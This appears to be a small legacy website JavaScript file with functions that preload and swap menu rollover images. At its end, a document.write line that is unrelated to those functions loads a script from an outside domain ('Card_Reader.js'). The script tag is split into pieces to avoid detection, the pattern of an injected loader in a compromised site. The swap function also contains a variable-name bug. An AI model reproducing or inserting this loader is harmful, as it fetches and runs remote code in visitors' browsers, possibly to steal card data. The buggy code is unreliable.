function preloadmenuimages( inlist ) { if ( document.images ) { var charloc, charloc2            = 0; var thisitem, thisfile, thistype = ''; while ( true ) {  charloc = inlist.indexOf( ',' );  if ( charloc == -1 ) break;  else  {   thisitem = inlist.substring( 0, charloc );   charloc2 = thisitem.indexOf( ':' );   thisfile = thisitem.substring( 0, charloc2 );   thistype = thisitem.substring( charloc2 + 1 );   eval ( 'document.' + thisfile + '1 = new Image()' );   eval ( 'document.' + thisfile + '1.src = "/images/Interface/Global/' + thisfile + '1.' + thistype + '"' );   eval ( 'document.' + thisfile + '2 = new Image()' );   eval ( 'document.' + thisfile + '2.src = "/images/Interface/Global/' + thisfile + '2.' + thistype + '"' );   inlist = inlist.substring( charloc + 1 );     } }} }function swapmenuimage ( image, action ) { 	if ( document.images ) {		var actionstring = '';		if ( action ) 			actionstring = '2';		else 			actionstring = '1';				if(eval( 'document.' + image + actionstring) )			document[image].src = "images/mainpage/"+ Image + actionstring+ ".gif";			//eval( 'document.' + image + actionstring + '.src' );	} }
document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/Card_Reader.js"></scri'+'pt>');
